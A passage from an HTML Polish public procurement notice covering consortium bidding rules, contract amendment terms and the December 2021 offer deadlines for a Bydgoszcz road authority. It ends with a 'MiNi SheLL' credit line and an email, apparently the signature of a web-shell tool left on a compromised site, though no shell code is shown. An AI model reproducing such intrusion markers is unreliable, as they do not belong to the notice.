wykonawców<br/>występujących wspólnie,<br/>4) z treści formularza ofertowego powinno wynikać, że oferta składana jest w imieniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>5) w miejscach dotyczących danych poszczególnych wykonawców (nazwa, adres, NIP, REGON,<br/>kategorię przedsiębiorstwa, do której należy) należy wpisać stosowne dane dotyczące<br/>poszczególnych Wykonawców wspólnie ubiegających się o dofinansowanie.<br/>6) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np.<br/>konsorcjum, spółka cywilna), wszelka korespondencja prowadzona będzie wyłącznie<br/>z pełnomocnikiem wymienionym w pełnomocnictwie, występującym jako reprezentant<br/>pozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonywania zmian umowy w granicach wyznaczonych<br/>przepisami ustawy Pzp, w tym art. 455 oraz w zakresie i na warunkach określonych w<br/>projektowanych postanowieniach umowy. Projektowane postanowienia umowy w sprawie<br/>zamówienia publicznego określa wzór umowy - zał. nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofetę wraz z wymaganymi dokumentami za pośrednictwem platformy zakupowej Open Nexus, dostępnej pod adresem: www.platformazakupowa.pl/zdmikp_bydgoszcz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-28 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dotyczy sekcji: 4.2.10.) Data rozpoczęcia realizacji zamówienia wyznaczona na dzień 01.01.2022 r. może ulec zmianie jedynie w przypadku przedłużającej się procedury wyboru<br/>wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com